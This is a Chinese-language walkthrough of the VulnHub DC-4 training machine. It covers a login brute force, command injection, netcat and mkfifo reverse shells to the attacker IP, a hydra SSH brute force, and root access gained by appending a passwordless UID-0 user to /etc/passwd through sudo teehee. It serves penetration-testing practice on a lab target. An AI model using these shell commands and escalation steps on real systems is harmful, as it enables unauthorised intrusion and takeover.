---

一、環(huán)境搭建

DC-4下載地址：https://download.vulnhub.com/dc/DC-4.zip
kali：192.168.144.148
DC-4：192.168.144.152

---

二、滲透流程

端口掃描：nmap -T5 -p- -sV -sT -A 192.168.144.152

思路：
1、訪問(wèn)80頁(yè)面，爆破賬號(hào)密碼（可利用）
2、對(duì)http://192.168.144.152進(jìn)行目錄爆破
3、查看網(wǎng)頁(yè)源代碼
4、查看web指紋信息
……

使用burpsuite對(duì)登錄頁(yè)面進(jìn)行爆破：admin：happy

思路：登錄后有run command按鈕，抓包發(fā)現(xiàn)可以執(zhí)行命令
1、請(qǐng)求包中執(zhí)行反彈shell命令（可利用）
2、使用wget，讓靶機(jī)下載webshell，然后連接webshell
……

方法1：

使用netcat反彈shell：nc -e /bin/sh 192.168.144.148 4444
kali監(jiān)聽：nc -lvnp 4444

python -c 'import pty;pty.spawn("/bin/sh")'

方法2：

kali端監(jiān)聽： nc -lnvp 4444
修改網(wǎng)頁(yè)源代碼為反彈shell代碼：rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.144.148 4444 > /tmp/f;，然后點(diǎn)擊run

---

kali端獲取到反彈shell

思路（此時(shí)已經(jīng)拿到shell）：
1、查看當(dāng)前權(quán)限
2、翻翻找找，看看有沒(méi)有可利用的
……

python -c 'import pty;pty.spawn("/bin/bash")'

cat /etc/passwd 發(fā)現(xiàn)三個(gè)用戶：charles、jim、sam

cd /home 發(fā)現(xiàn)三個(gè)用戶目錄
/jim路徑下發(fā)現(xiàn)old-passwords.bak文件進(jìn)行利用

利用old-passwords.bak保存的密碼對(duì)jim的密碼進(jìn)行爆破；
爆破密碼：hydra -l jim -P passwd.txt -s 22 ssh://192.168.144.152
成功獲取密碼：jim：jibril04
ssh登錄：ssh jim@192.168.144.152 -p 22

cd /var/mail 下發(fā)現(xiàn)charles的密碼：^xHhA&hvim0y

jim下沒(méi)其他可以利用的了，我們嘗試登錄charles用戶
ssh charles@192.168.144.152 -p 22

查看是否有sudo權(quán)限：sudo -l
發(fā)現(xiàn)teehee執(zhí)行權(quán)限

teehee --help
發(fā)現(xiàn)-a參數(shù)可以寫入文件

用戶名：密碼：用戶ID：組ID：用戶說(shuō)明：家目錄：登陸之后的 shell
echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
su test

---

三、思路總結(jié)

1、爆破登錄賬號(hào)密碼
2、根據(jù)頁(yè)面功能反彈shell
3、查看獲取到的shell的可利用文件
4、ssh連接  
5、利用teehee執(zhí)行權(quán)限添加特權(quán)用戶，獲取root權(quán)限

---

參考鏈接：
https://blog.mzfr.me/vulnhub-writeups/2019-07-11-DC4